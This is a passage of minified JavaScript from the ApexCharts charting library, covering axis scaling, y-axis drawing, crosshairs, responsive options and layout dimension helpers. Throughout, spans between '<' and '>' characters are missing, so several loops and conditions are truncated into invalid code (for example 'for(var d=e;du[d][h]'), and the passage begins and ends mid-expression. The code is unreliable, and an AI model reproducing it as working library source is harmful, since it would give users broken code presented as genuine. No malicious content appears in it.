a!==-Number.MAX_VALUE&&k.isNumber(a)?i.xAxisScale=this.linearScale(e,a,t.tickAmount?t.tickAmount:r<5&&r>1?r+1:5,0):i.xAxisScale=this.linearScale(0,5,5),i.xAxisScale}},{key:"setMultipleYScales",value:function(){var e=this,a=this.w.globals,n=this.w.config,i=a.minYArr.concat([]),t=a.maxYArr.concat([]),r=[];n.yaxis.forEach((function(a,o){var s=o;n.series.forEach((function(e,n){e.name===a.seriesName&&(s=n,o!==n?r.push({index:n,similarIndex:o,alreadyExists:!0}):r.push({index:n}))}));var l=i[s],u=t[s];e.setYScaleForIndex(o,l,u)})),this.sameScaleInMultipleAxes(i,t,r)}},{key:"sameScaleInMultipleAxes",value:function(e,a,n){var i=this,t=this.w.config,r=this.w.globals,o=[];n.forEach((function(e){e.alreadyExists&&(void 0===o[e.index]&&(o[e.index]=[]),o[e.index].push(e.index),o[e.index].push(e.similarIndex))})),r.yAxisSameScaleIndices=o,o.forEach((function(e,a){o.forEach((function(n,i){var t,r;a!==i&&(t=e,r=n,t.filter((function(e){return-1!==r.indexOf(e)}))).length>0&&(o[a]=o[a].concat(o[i]))}))}));var s=o.map((function(e){return e.filter((function(a,n){return e.indexOf(a)===n}))})).map((function(e){return e.sort()}));o=o.filter((function(e){return!!e}));var l=s.slice(),u=l.map((function(e){return JSON.stringify(e)}));l=l.filter((function(e,a){return u.indexOf(JSON.stringify(e))===a}));var c=[],d=[];e.forEach((function(e,n){l.forEach((function(i,t){i.indexOf(n)>-1&&(void 0===c[t]&&(c[t]=[],d[t]=[]),c[t].push({key:n,value:e}),d[t].push({key:n,value:a[n]}))}))}));var h=Array.apply(null,Array(l.length)).map(Number.prototype.valueOf,Number.MIN_VALUE),p=Array.apply(null,Array(l.length)).map(Number.prototype.valueOf,-Number.MAX_VALUE);c.forEach((function(e,a){e.forEach((function(e,n){h[a]=Math.min(e.value,h[a])}))})),d.forEach((function(e,a){e.forEach((function(e,n){p[a]=Math.max(e.value,p[a])}))})),e.forEach((function(e,a){d.forEach((function(e,n){var o=h[n],s=p[n];t.chart.stacked&&(s=0,e.forEach((function(e,a){e.value!==-Number.MAX_VALUE&&(s+=e.value),o!==Number.MIN_VALUE&&(o+=c[n][a].value)}))),e.forEach((function(n,l){e[l].key===a&&(void 0!==t.yaxis[a].min&&(o="function"==typeof t.yaxis[a].min?t.yaxis[a].min(r.minY):t.yaxis[a].min),void 0!==t.yaxis[a].max&&(s="function"==typeof t.yaxis[a].max?t.yaxis[a].max(r.maxY):t.yaxis[a].max),i.setYScaleForIndex(a,o,s))}))}))}))}},{key:"autoScaleY",value:function(e,a,n){e||(e=this);var i=e.w;if(i.globals.isMultipleYAxis||i.globals.collapsedSeries.length)return console.warn("autoScaleYaxis is not supported in a multi-yaxis chart."),a;var t=i.globals.seriesX[0],r=i.config.chart.stacked;return a.forEach((function(e,o){for(var s=0,l=0;l=n.xaxis.min){s=l;break}var u,c,d=i.globals.minYArr[o],h=i.globals.maxYArr[o],p=i.globals.stackedSeriesTotals;i.globals.series.forEach((function(o,l){var m=o[s];r?(m=p[s],u=c=m,p.forEach((function(e,a){t[a]<=n.xaxis.max&&t[a]>=n.xaxis.min&&(e>c&&null!==e&&(c=e),o[a]=n.xaxis.min){var r=e,o=e;i.globals.series.forEach((function(n,i){null!==e&&(r=Math.min(n[a],r),o=Math.max(n[a],o))})),o>c&&null!==o&&(c=o),rd&&(u=d),a.length>1?(a[l].min=void 0===e.min?u:e.min,a[l].max=void 0===e.max?c:e.max):(a[0].min=void 0===e.min?u:e.min,a[0].max=void 0===e.max?c:e.max)}))})),a}}]),e}(),Q=function(){function e(a){s(this,e),this.ctx=a,this.w=a.w,this.scales=new X(a)}return u(e,[{key:"init",value:function(){this.setYRange(),this.setXRange(),this.setZRange()}},{key:"getMinYMaxY",value:function(e){var a=arguments.length>1&&void 0!==arguments[1]?arguments[1]:Number.MAX_VALUE,n=arguments.length>2&&void 0!==arguments[2]?arguments[2]:-Number.MAX_VALUE,i=arguments.length>3&&void 0!==arguments[3]?arguments[3]:null,t=this.w.config,r=this.w.globals,o=-Number.MAX_VALUE,s=Number.MIN_VALUE;null===i&&(i=e+1);var l=r.series,u=l,c=l;"candlestick"===t.chart.type?(u=r.seriesCandleL,c=r.seriesCandleH):"boxPlot"===t.chart.type?(u=r.seriesCandleO,c=r.seriesCandleC):r.isRangeData&&(u=r.seriesRangeStart,c=r.seriesRangeEnd);for(var d=e;du[d][h]&&u[d][h]<0&&(s=u[d][h])):r.hasNullValues=!0}}return"rangeBar"===t.chart.type&&r.seriesRangeStart.length&&r.isBarHorizontal&&(s=a),"bar"===t.chart.type&&(s<0&&o<0&&(o=0),s===Number.MIN_VALUE&&(s=0)),{minY:s,maxY:o,lowestY:a,highestY:n}}},{key:"setYRange",value:function(){var e=this.w.globals,a=this.w.config;e.maxY=-Number.MAX_VALUE,e.minY=Number.MIN_VALUE;var n=Number.MAX_VALUE;if(e.isMultipleYAxis)for(var i=0;i=0&&n<=10||void 0!==a.yaxis[0].min||void 0!==a.yaxis[0].max)&&(o=0),e.minY=n-5*o/100,n>0&&e.minY<0&&(e.minY=0),e.maxY=e.maxY+5*o/100}return a.yaxis.forEach((function(a,n){void 0!==a.max&&("number"==typeof a.max?e.maxYArr[n]=a.max:"function"==typeof a.max&&(e.maxYArr[n]=a.max(e.isMultipleYAxis?e.maxYArr[n]:e.maxY)),e.maxY=e.maxYArr[n]),void 0!==a.min&&("number"==typeof a.min?e.minYArr[n]=a.min:"function"==typeof a.min&&(e.minYArr[n]=a.min(e.isMultipleYAxis?e.minYArr[n]===Number.MIN_VALUE?0:e.minYArr[n]:e.minY)),e.minY=e.minYArr[n])})),e.isBarHorizontal&&["min","max"].forEach((function(n){void 0!==a.xaxis[n]&&"number"==typeof a.xaxis[n]&&("min"===n?e.minY=a.xaxis[n]:e.maxY=a.xaxis[n])})),e.isMultipleYAxis?(this.scales.setMultipleYScales(),e.minY=n,e.yAxisScale.forEach((function(a,n){e.minYArr[n]=a.niceMin,e.maxYArr[n]=a.niceMax}))):(this.scales.setYScaleForIndex(0,e.minY,e.maxY),e.minY=e.yAxisScale[0].niceMin,e.maxY=e.yAxisScale[0].niceMax,e.minYArr[0]=e.yAxisScale[0].niceMin,e.maxYArr[0]=e.yAxisScale[0].niceMax),{minY:e.minY,maxY:e.maxY,minYArr:e.minYArr,maxYArr:e.maxYArr,yAxisScale:e.yAxisScale}}},{key:"setXRange",value:function(){var e=this.w.globals,a=this.w.config,n="numeric"===a.xaxis.type||"datetime"===a.xaxis.type||"category"===a.xaxis.type&&!e.noLabelsProvided||e.noLabelsProvided||e.isXNumeric;if(e.isXNumeric&&function(){for(var a=0;ae.dataPoints&&0!==e.dataPoints&&(i=e.dataPoints-1)):"dataPoints"===a.xaxis.tickAmount?(e.series.length>1&&(i=e.series[e.maxValsInArrayIndex].length-1),e.isXNumeric&&(i=e.maxX-e.minX-1)):i=a.xaxis.tickAmount,e.xTickAmount=i,void 0!==a.xaxis.max&&"number"==typeof a.xaxis.max&&(e.maxX=a.xaxis.max),void 0!==a.xaxis.min&&"number"==typeof a.xaxis.min&&(e.minX=a.xaxis.min),void 0!==a.xaxis.range&&(e.minX=e.maxX-a.xaxis.range),e.minX!==Number.MAX_VALUE&&e.maxX!==-Number.MAX_VALUE)if(a.xaxis.convertedCatToNumeric&&!e.dataFormatXNumeric){for(var t=[],r=e.minX-1;r0&&(e.xAxisScale=this.scales.linearScale(1,e.labels.length,i-1),e.seriesX=e.labels.slice());n&&(e.labels=e.xAxisScale.result.slice())}return e.isBarHorizontal&&e.labels.length&&(e.xTickAmount=e.labels.length),this._handleSingleDataPoint(),this._getMinXDiff(),{minX:e.minX,maxX:e.maxX}}},{key:"setZRange",value:function(){var e=this.w.globals;if(e.isDataXYZ)for(var a=0;a0){var t=a-i[n-1];t>0&&(e.minXDiff=Math.min(t,e.minXDiff))}})),1!==e.dataPoints&&e.minXDiff!==Number.MAX_VALUE||(e.minXDiff=.5)}))}},{key:"_setStackedMinMax",value:function(){var e=this.w.globals,a=[],n=[];if(e.series.length)for(var i=0;i0?t=t+parseFloat(e.series[o][i])+1e-4:r+=parseFloat(e.series[o][i])),o===e.series.length-1&&(a.push(t),n.push(r));for(var s=0;s=0;g--)v(g);if(void 0!==n.config.yaxis[e].title.text){var b=i.group({class:"apexcharts-yaxis-title"}),k=0;n.config.yaxis[e].opposite&&(k=n.globals.translateYAxisX[e]);var y=i.drawText({x:k,y:n.globals.gridHeight/2+n.globals.translateY+n.config.yaxis[e].title.offsetY,text:n.config.yaxis[e].title.text,textAnchor:"end",foreColor:n.config.yaxis[e].title.style.color,fontSize:n.config.yaxis[e].title.style.fontSize,fontWeight:n.config.yaxis[e].title.style.fontWeight,fontFamily:n.config.yaxis[e].title.style.fontFamily,cssClass:"apexcharts-yaxis-title-text "+n.config.yaxis[e].title.style.cssClass});b.add(y),l.add(b)}var x=n.config.yaxis[e].axisBorder,A=31+x.offsetX;if(n.config.yaxis[e].opposite&&(A=-31-x.offsetX),x.show){var w=i.drawLine(A,n.globals.translateY+x.offsetY-2,A,n.globals.gridHeight+n.globals.translateY+x.offsetY+2,x.color,0,x.width);l.add(w)}return n.config.yaxis[e].axisTicks.show&&this.axesUtils.drawYAxisTicks(A,c,x,n.config.yaxis[e].axisTicks,e,d,l),l}},{key:"drawYaxisInversed",value:function(e){var a=this.w,n=new S(this.ctx),i=n.group({class:"apexcharts-xaxis apexcharts-yaxis-inversed"}),t=n.group({class:"apexcharts-xaxis-texts-g",transform:"translate(".concat(a.globals.translateXAxisX,", ").concat(a.globals.translateXAxisY,")")});i.add(t);var r=a.globals.yAxisScale[e].result.length-1,o=a.globals.gridWidth/r+.1,s=o+a.config.xaxis.labels.offsetX,l=a.globals.xLabelFormatter,u=a.globals.yAxisScale[e].result.slice(),c=a.globals.timescaleLabels;c.length>0&&(this.xaxisLabels=c.slice(),r=(u=c.slice()).length),u=this.axesUtils.checkForReversedLabels(e,u);var d=c.length;if(a.config.xaxis.labels.show)for(var h=d?0:r;d?h=0;d?h++:h--){var p=u[h];p=l(p,h,a);var m=a.globals.gridWidth+a.globals.padHorizontal-(s-o+a.config.xaxis.labels.offsetX);if(c.length){var f=this.axesUtils.getLabel(u,c,m,h,this.drawnLabels,this.xaxisFontSize);m=f.x,p=f.text,this.drawnLabels.push(f.text),0===h&&a.globals.skipFirstTimelinelabel&&(p=""),h===u.length-1&&a.globals.skipLastTimelinelabel&&(p="")}var v=n.drawText({x:m,y:this.xAxisoffX+a.config.xaxis.labels.offsetY+30-("top"===a.config.xaxis.position?a.globals.xAxisHeight+a.config.xaxis.axisTicks.height-2:0),text:p,textAnchor:"middle",foreColor:Array.isArray(this.xaxisForeColors)?this.xaxisForeColors[e]:this.xaxisForeColors,fontSize:this.xaxisFontSize,fontFamily:this.xaxisFontFamily,fontWeight:a.config.xaxis.labels.style.fontWeight,isPlainText:!1,cssClass:"apexcharts-xaxis-label "+a.config.xaxis.labels.style.cssClass});t.add(v),v.tspan(p);var g=document.createElementNS(a.globals.SVGNS,"title");g.textContent=p,v.node.appendChild(g),s+=o}return this.inversedYAxisTitleText(i),this.inversedYAxisBorder(i),i}},{key:"inversedYAxisBorder",value:function(e){var a=this.w,n=new S(this.ctx),i=a.config.xaxis.axisBorder;if(i.show){var t=0;"bar"===a.config.chart.type&&a.globals.isXNumeric&&(t-=15);var r=n.drawLine(a.globals.padHorizontal+t+i.offsetX,this.xAxisoffX,a.globals.gridWidth,this.xAxisoffX,i.color,0,i.height);e.add(r)}}},{key:"inversedYAxisTitleText",value:function(e){var a=this.w,n=new S(this.ctx);if(void 0!==a.config.xaxis.title.text){var i=n.group({class:"apexcharts-xaxis-title apexcharts-yaxis-title-inversed"}),t=n.drawText({x:a.globals.gridWidth/2+a.config.xaxis.title.offsetX,y:this.xAxisoffX+parseFloat(this.xaxisFontSize)+parseFloat(a.config.xaxis.title.style.fontSize)+a.config.xaxis.title.offsetY+20,text:a.config.xaxis.title.text,textAnchor:"middle",fontSize:a.config.xaxis.title.style.fontSize,fontFamily:a.config.xaxis.title.style.fontFamily,fontWeight:a.config.xaxis.title.style.fontWeight,foreColor:a.config.xaxis.title.style.color,cssClass:"apexcharts-xaxis-title-text "+a.config.xaxis.title.style.cssClass});i.add(t),e.add(i)}}},{key:"yAxisTitleRotate",value:function(e,a){var n=this.w,i=new S(this.ctx),t={width:0,height:0},r={width:0,height:0},o=n.globals.dom.baseEl.querySelector(" .apexcharts-yaxis[rel='".concat(e,"'] .apexcharts-yaxis-texts-g"));null!==o&&(t=o.getBoundingClientRect());var s=n.globals.dom.baseEl.querySelector(".apexcharts-yaxis[rel='".concat(e,"'] .apexcharts-yaxis-title text"));if(null!==s&&(r=s.getBoundingClientRect()),null!==s){var l=this.xPaddingForYAxisTitle(e,t,r,a);s.setAttribute("x",l.xPos-(a?10:0))}if(null!==s){var u=i.rotateAroundCenter(s);s.setAttribute("transform","rotate(".concat(a?-1*n.config.yaxis[e].title.rotate:n.config.yaxis[e].title.rotate," ").concat(u.x," ").concat(u.y,")"))}}},{key:"xPaddingForYAxisTitle",value:function(e,a,n,i){var t=this.w,r=0,o=0,s=10;return void 0===t.config.yaxis[e].title.text||e<0?{xPos:o,padd:0}:(i?(o=a.width+t.config.yaxis[e].title.offsetX+n.width/2+s/2,0===(r+=1)&&(o-=s/2)):(o=-1*a.width+t.config.yaxis[e].title.offsetX+s/2+n.width/2,t.globals.isBarHorizontal&&(s=25,o=-1*a.width-t.config.yaxis[e].title.offsetX-s)),{xPos:o,padd:s})}},{key:"setYAxisXPosition",value:function(e,a){var n=this.w,i=0,t=0,r=18,o=1;n.config.yaxis.length>1&&(this.multipleYs=!0),n.config.yaxis.map((function(s,l){var u=n.globals.ignoreYAxisIndexes.indexOf(l)>-1||!s.show||s.floating||0===e[l].width,c=e[l].width+a[l].width;s.opposite?n.globals.isBarHorizontal?(t=n.globals.gridWidth+n.globals.translateX-1,n.globals.translateYAxisX[l]=t-s.labels.offsetX):(t=n.globals.gridWidth+n.globals.translateX+o,u||(o=o+c+20),n.globals.translateYAxisX[l]=t-s.labels.offsetX+20):(i=n.globals.translateX-r,u||(r=r+c+20),n.globals.translateYAxisX[l]=i+s.labels.offsetX)}))}},{key:"setYAxisTextAlignments",value:function(){var e=this.w,a=e.globals.dom.baseEl.getElementsByClassName("apexcharts-yaxis");(a=k.listToArray(a)).forEach((function(a,n){var i=e.config.yaxis[n];if(i&&void 0!==i.labels.align){var t=e.globals.dom.baseEl.querySelector(".apexcharts-yaxis[rel='".concat(n,"'] .apexcharts-yaxis-texts-g")),r=e.globals.dom.baseEl.querySelectorAll(".apexcharts-yaxis[rel='".concat(n,"'] .apexcharts-yaxis-label"));r=k.listToArray(r);var o=t.getBoundingClientRect();"left"===i.labels.align?(r.forEach((function(e,a){e.setAttribute("text-anchor","start")})),i.opposite||t.setAttribute("transform","translate(-".concat(o.width,", 0)"))):"center"===i.labels.align?(r.forEach((function(e,a){e.setAttribute("text-anchor","middle")})),t.setAttribute("transform","translate(".concat(o.width/2*(i.opposite?1:-1),", 0)"))):"right"===i.labels.align&&(r.forEach((function(e,a){e.setAttribute("text-anchor","end")})),i.opposite&&t.setAttribute("transform","translate(".concat(o.width,", 0)")))}}))}}]),e}(),ee=function(){function e(a){s(this,e),this.ctx=a,this.w=a.w,this.documentEvent=k.bind(this.documentEvent,this)}return u(e,[{key:"addEventListener",value:function(e,a){var n=this.w;n.globals.events.hasOwnProperty(e)?n.globals.events[e].push(a):n.globals.events[e]=[a]}},{key:"removeEventListener",value:function(e,a){var n=this.w;if(n.globals.events.hasOwnProperty(e)){var i=n.globals.events[e].indexOf(a);-1!==i&&n.globals.events[e].splice(i,1)}}},{key:"fireEvent",value:function(e,a){var n=this.w;if(n.globals.events.hasOwnProperty(e)){a&&a.length||(a=[]);for(var i=n.globals.events[e],t=i.length,r=0;r0&&(a=this.w.config.chart.locales.concat(window.Apex.chart.locales));var n=a.filter((function(a){return a.name===e}))[0];if(!n)throw new Error("Wrong locale name provided. Please make sure you set the correct locale name in options");var i=k.extend(P,n);this.w.globals.locale=i.options}}]),e}(),ne=function(){function e(a){s(this,e),this.ctx=a,this.w=a.w}return u(e,[{key:"drawAxis",value:function(e,a){var n,i,t=this.w.globals,r=this.w.config,o=new q(this.ctx),s=new $(this.ctx);t.axisCharts&&"radar"!==e&&(t.isBarHorizontal?(i=s.drawYaxisInversed(0),n=o.drawXaxisInversed(0),t.dom.elGraphical.add(n),t.dom.elGraphical.add(i)):(n=o.drawXaxis(),t.dom.elGraphical.add(n),r.yaxis.map((function(e,a){-1===t.ignoreYAxisIndexes.indexOf(a)&&(i=s.drawYaxis(a),t.dom.Paper.add(i))}))))}}]),e}(),ie=function(){function e(a){s(this,e),this.ctx=a,this.w=a.w}return u(e,[{key:"drawXCrosshairs",value:function(){var e=this.w,a=new S(this.ctx),n=new x(this.ctx),i=e.config.xaxis.crosshairs.fill.gradient,t=e.config.xaxis.crosshairs.dropShadow,r=e.config.xaxis.crosshairs.fill.type,o=i.colorFrom,s=i.colorTo,l=i.opacityFrom,u=i.opacityTo,c=i.stops,d=t.enabled,h=t.left,p=t.top,m=t.blur,f=t.color,v=t.opacity,g=e.config.xaxis.crosshairs.fill.color;if(e.config.xaxis.crosshairs.show){"gradient"===r&&(g=a.drawGradient("vertical",o,s,l,u,null,c,null));var b=a.drawRect();1===e.config.xaxis.crosshairs.width&&(b=a.drawLine());var y=e.globals.gridHeight;(!k.isNumber(y)||y<0)&&(y=0);var A=e.config.xaxis.crosshairs.width;(!k.isNumber(A)||A<0)&&(A=0),b.attr({class:"apexcharts-xcrosshairs",x:0,y:0,y2:y,width:A,height:y,fill:g,filter:"none","fill-opacity":e.config.xaxis.crosshairs.opacity,stroke:e.config.xaxis.crosshairs.stroke.color,"stroke-width":e.config.xaxis.crosshairs.stroke.width,"stroke-dasharray":e.config.xaxis.crosshairs.stroke.dashArray}),d&&(b=n.dropShadow(b,{left:h,top:p,blur:m,color:f,opacity:v})),e.globals.dom.elGraphical.add(b)}}},{key:"drawYCrosshairs",value:function(){var e=this.w,a=new S(this.ctx),n=e.config.yaxis[0].crosshairs,i=e.globals.barPadForNumericAxis;if(e.config.yaxis[0].crosshairs.show){var t=a.drawLine(-i,0,e.globals.gridWidth+i,0,n.stroke.color,n.stroke.dashArray,n.stroke.width);t.attr({class:"apexcharts-ycrosshairs"}),e.globals.dom.elGraphical.add(t)}var r=a.drawLine(-i,0,e.globals.gridWidth+i,0,n.stroke.color,0,0);r.attr({class:"apexcharts-ycrosshairs-hidden"}),e.globals.dom.elGraphical.add(r)}}]),e}(),te=function(){function e(a){s(this,e),this.ctx=a,this.w=a.w}return u(e,[{key:"checkResponsiveConfig",value:function(e){var a=this,n=this.w,i=n.config;if(0!==i.responsive.length){var t=i.responsive.slice();t.sort((function(e,a){return e.breakpoint>a.breakpoint?1:a.breakpoint>e.breakpoint?-1:0})).reverse();var r=new F({}),o=function(){var e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:{},i=t[0].breakpoint,o=window.innerWidth>0?window.innerWidth:screen.width;if(o>i){var s=A.extendArrayProps(r,n.globals.initialConfig,n);e=k.extend(s,e),e=k.extend(n.config,e),a.overrideResponsiveOptions(e)}else for(var l=0;l0&&"function"==typeof a.config.colors[0]&&(a.globals.colors=a.config.series.map((function(n,i){var t=a.config.colors[i];return t||(t=a.config.colors[0]),"function"==typeof t?(e.isColorFn=!0,t({value:a.globals.axisCharts?a.globals.series[i][0]?a.globals.series[i][0]:0:a.globals.series[i],seriesIndex:i,dataPointIndex:i,w:a})):t})))),a.globals.seriesColors.map((function(e,n){e&&(a.globals.colors[n]=e)})),a.config.theme.monochrome.enabled){var i=[],t=a.globals.series.length;(this.isBarDistributed||this.isHeatmapDistributed)&&(t=a.globals.series[0].length*a.globals.series.length);for(var r=a.config.theme.monochrome.color,o=1/(t/a.config.theme.monochrome.shadeIntensity),s=a.config.theme.monochrome.shadeTo,l=0,u=0;u2&&void 0!==arguments[2]?arguments[2]:null,i=this.w,t=a||i.globals.series.length;if(null===n&&(n=this.isBarDistributed||this.isHeatmapDistributed||"heatmap"===i.config.chart.type&&i.config.plotOptions.heatmap.colorScale.inverse),n&&i.globals.series.length&&(t=i.globals.series[i.globals.maxValsInArrayIndex].length*i.globals.series.length),e.lengthe.globals.svgWidth&&(this.dCtx.lgRect.width=e.globals.svgWidth/1.5),this.dCtx.lgRect}},{key:"getLargestStringFromMultiArr",value:function(e,a){var n=e;if(this.w.globals.isMultiLineX){var i=a.map((function(e,a){return Array.isArray(e)?e.length:1})),t=Math.max.apply(Math,v(i));n=a[i.indexOf(t)]}return n}}]),e}(),le=function(){function e(a){s(this,e),this.w=a.w,this.dCtx=a}return u(e,[{key:"getxAxisLabelsCoords",value:function(){var e,a=this.w,n=a.globals.labels.slice();if(a.config.xaxis.convertedCatToNumeric&&0===n.length&&(n=a.globals.categoryLabels),a.globals.timescaleLabels.length>0){var i=this.getxAxisTimeScaleLabelsCoords();e={width:i.width,height:i.height},a.globals.rotateXLabels=!1}else{this.dCtx.lgWidthForSideLegends="left"!==a.config.legend.position&&"right"!==a.config.legend.position||a.config.legend.floating?0:this.dCtx.lgRect.width;var t=a.globals.xLabelFormatter,r=k.getLargestStringFromArr(n),o=this.dCtx.dimHelpers.getLargestStringFromMultiArr(r,n);a.globals.isBarHorizontal&&(o=r=a.globals.yAxisScale[0].result.reduce((function(e,a){return e.length>a.length?e:a}),0));var s=new J(this.dCtx.ctx),l=r;r=s.xLabelFormat(t,r,l,{i:void 0,dateFormatter:new H(this.dCtx.ctx).formatDate,w:a}),o=s.xLabelFormat(t,o,l,{i:void 0,dateFormatter:new H(this.dCtx.ctx).formatDate,w:a}),(a.config.xaxis.convertedCatToNumeric&&void 0===r||""===String(r).trim())&&(o=r="1");var u=new S(this.dCtx.ctx),c=u.getTextRects(r,a.config.xaxis.labels.style.fontSize),d=c;if(r!==o&&(d=u.getTextRects(o,a.config.xaxis.labels.style.fontSize)),(e={width:c.width>=d.width?c.width:d.width,height:c.height>=d.height?c.height:d.height}).width*n.length>a.globals.svgWidth-this.dCtx.lgWidthForSideLegends-this.dCtx.yAxisWidth-this.dCtx.gridPad.left-this.dCtx.gridPad.right&&0!==a.config.xaxis.labels.rotate||a.config.xaxis.labels.rotateAlways){if(!a.globals.isBarHorizontal){a.globals.rotateXLabels=!0;var h=function(e){return u.getTextRects(e,a.config.xaxis.labels.style.fontSize,a.config.xaxis.labels.style.fontFamily,"rotate(".concat(a.config.xaxis.labels.rotate," 0 0)"),!1)};c=h(r),r!==o&&(d=h(o)),e.height=(c.height>d.height?c.height:d.height)/1.5,e.width=c.width>d.width?c.width:d.width}}else a.globals.rotateXLabels=!1}return a.config.xaxis.labels.show||(e={width:0,height:0}),{width:e.width,height:e.height}}},{key:"getxAxisGroupLabelsCoords",value:function(){var e,a=this.w;if(!a.globals.hasGroups)return{width:0,height:0};var n,i=(null===(e=a.config.xaxis.group.style)||void 0===e?void 0:e.fontSize)||a.config.xaxis.labels.style.fontSize,t=a.globals.groups.map((function(e){return e.title})),r=k.getLargestStringFromArr(t),o=this.dCtx.dimHelpers.getLargestStringFromMultiArr(r,t),s=new S(this.dCtx.ctx),l=s.getTextRects(r,i),u=l;return r!==o&&(u=s.getTextRects(o,i)),n={width:l.width>=u.width?l.width:u.width,height:l.height>=u.height?l.height:u.height},a.config.xaxis.labels.show||(n={width:0,height:0}),{width:n.width,height:n.height}}},{key:"getxAxisTitleCoords",value:function(){var e=this.w,a=0,n=0;if(void 0!==e.config.xaxis.title.text){var i=new S(this.dCtx.ctx).getTextRects(e.config.xaxis.title.text,e.config.xaxis.title.style.fontSize);a=i.width,n=i.height}return{width:a,height:n}}},{key:"getxAxisTimeScaleLabelsCoords",value:function(){var e,a=this.w;this.dCtx.timescaleLabels=a.globals.timescaleLabels.slice();var n=this.dCtx.timescaleLabels.map((function(e){return e.value})),i=n.reduce((function(e,a){return void 0===e?(console.error("You have possibly supplied invalid Date format. Please supply a valid JavaScript Date"),0):e.length>a.length?e:a}),0);return 1.05*(e=new S(this.dCtx.ctx).getTextRects(i,a.config.xaxis.labels.style.fontSize)).width*n.length>a.globals.gridWidth&&0!==a.config.xaxis.labels.rotate&&(a.globals.overlappingXLabels=!0),e}},{key:"additionalPaddingXLabels",value:function(e){var a=this,n=this.w,i=n.globals,t=n.config,r=t.xaxis.type,o=e.width;i.skipLastTimelinelabel=!1,i.skipFirstTimelinelabel=!1;var s=n.config.yaxis[0].opposite&&n.globals.isBarHorizontal,l=function(e,s){(function(e){return-1!==i.collapsedSeriesIndices.indexOf(e)})(s)||function(e){if(a.dCtx.timescaleLabels&&a.dCtx.timescaleLabels.length){var s=a.dCtx.timescaleLabels[0],l=a.dCtx.timescaleLabels[a.dCtx.timescaleLabels.length-1].position+o/1.75-a.dCtx.yAxisWidthRight,u=s.position-o/1.75+a.dCtx.yAxisWidthLeft,c="right"===n.config.legend.position&&a.dCtx.lgRect.width>0?a.dCtx.lgRect.width:0;l>i.svgWidth-i.translateX-c&&(i.skipLastTimelinelabel=!0),u<-(e.show&&!e.floating||"bar"!==t.chart.type&&"candlestick"!==t.chart.type&&"rangeBar"!==t.chart.type&&"boxPlot"!==t.chart.type?10:o/1.75)&&(i.skipFirstTimelinelabel=!0)}else"datetime"===r?a.dCtx.gridPad.rightString(s.niceMax).length?c:s.niceMax,h=u(d,{seriesIndex:o,dataPointIndex:-1,w:a}),p=h;if(void 0!==h&&0!==h.length||(h=d),a.globals.isBarHorizontal){i=0;var m=a.globals.labels.slice();h=u(h=k.getLargestStringFromArr(m),{seriesIndex:o,dataPointIndex:-1,w:a}),p=e.dCtx.dimHelpers.getLargestStringFromMultiArr(h,m)}var f=new S(e.dCtx.ctx),v="rotate(".concat(r.labels.rotate," 0 0)"),g=f.getTextRects(h,r.labels.style.fontSize,r.labels.style.fontFamily,v,!1),b=g;h!==p&&(b=f.getTextRects(p,r.labels.style.fontSize,r.labels.style.fontFamily,v,!1)),n.push({width:(l>b.width||l>g.width?l:b.width>g.width?b.width:g.width)+i,height:b.height>g.height?b.height:g.height})}else n.push({width:0,height:0})})),n}},{key:"getyAxisTitleCoords",value:function(){var e=this,a=this.w,n=[];return a.config.yaxis.map((function(a,i){if(a.show&&void 0!==a.title.text){var t=new S(e.dCtx.ctx),r="rotate(".concat(a.title.rotate," 0 0)"),o=t.getTextRects(a.title.text,a.title.style.fontSize,a.title.style.fontFamily,r,!1);n.push({width:o.width,height:o.height})}else n.push({width:0,height:0})})),n}},{key:"getTotalYAxisWidth",value:function(){var e=this.w,a=0,n=0,i=0,t=e.globals.yAxisScale.length>1?10:0,r=new W(this.dCtx.ctx),o=function(o,s){var l=e.config.yaxis[s].floating,u=0;o.width>0&&!l?(u=o.width+t,function(a){return e.globals.ignoreYAxisIndexes.indexOf(a)>-1}(s)&&(u=u-o.width-t)):u=l||r.isYAxisHidden(s)?0:5,e.config.yaxis[s].opposite?i+=u:n+=u,a+=u};return e.globals.yLabelsCoords.map((function(e,a){o(e,a)})),e.globals.yTitleCoords.map((function(e,a){o(e,a)})),e.globals.isBarHorizontal&&!e.config.yaxis[0].floating&&(a=e.globals.yLabelsCoords[0].width+e.globals.yTitleCoords[0].width+15),this.dCtx.yAxisWidthLeft=n,this.dCtx.yAxisWidthRight=i,a}}]),e}(),ce=function(){function e(a){s(this,e),this.w=a.w,this.dCtx=a}return u(e,[{key:"gridPadForColumnsInNumericAxis",value:function(e){var a=this.w;if(a.globals.noData||a.globals.allSeriesCollapsed)return 0;var n=function(e){return"bar"===e||"rangeBar"===e||"candlestick"===e||"boxPlot"===e},i=a.config.chart.type,t=0,r=n(i)?a.config.series.length:1;if(a.globals.comboBarCount>0&&(r=a.globals.comboBarCount),a.globals.collapsedSeries.forEach((function(e){n(e.type)&&(r-=1)})),a.config.chart.stacked&&(r=1),(n(i)||a.globals.comboBarCount>0)&&a.globals.isXNumeric&&!a.globals.isBarHorizontal&&r>0){var o,s,l=Math.abs(a.globals.initialMaxX-a.globals.initialMinX);l<=3&&(l=a.globals.dataPoints),o=l/e,a.globals.minXDiff&&a.globals.minXDiff/o>0&&(s=a.globals.minXDiff/o),s>e/2&&(s/=2),(t=s/r*parseInt(a.config.plotOptions.bar.columnWidth,10)/100)<1&&(t=1),t=t/(r>1?1:1.5)+5,a.globals.barPadForNumericAxis=t}return t}},{key:"gridPadFortitleSubtitle",value:function(){var e=this,a=this.w,n=a.globals,i=this.dCtx.isSparkline||!a.globals.axisCharts?0:10;["title","subtitle"].forEach((function(n){void 0!==a.config[n].text?i+=a.config[n].margin:i+=e.dCtx.isSparkline||!a.globals.axisCharts?0:5})),!a.config.legend.show||"bottom"!==a.config.legend.position||a.config.legend.floating||a.globals.axisCharts||(i+=10);var t=this.dCtx.dimHelpers.getTitleSubtitleCoords("title"),r=this.dCtx.dimHelpers.getTitleSubtitleCoords("subtitle");n.gridHeight=n.gridHeight-t.height-r.height-i,n.translateY=n.translateY+t.height+r.height+i}},{key:"setGridXPosForDualYAxis",value:function(e,a){var n=this.w,i=new W(this.dCtx.ctx);n.config.yaxis.map((function(t,r){-1!==n.globals.ignoreYAxisIndexes.indexOf(r)||t.floating||i.isYAxisHidden(r)||(t.opposite&&(n.globals.translateX=n.globals.translateX-(a[r].width+e[r].width)-parseInt(n.config.yaxis[r].labels.style.fontSize,10)/1.2-12),n.globals.translateX<2&&(n.globals.translateX=2))}))}}]),e}(),de=function(){function 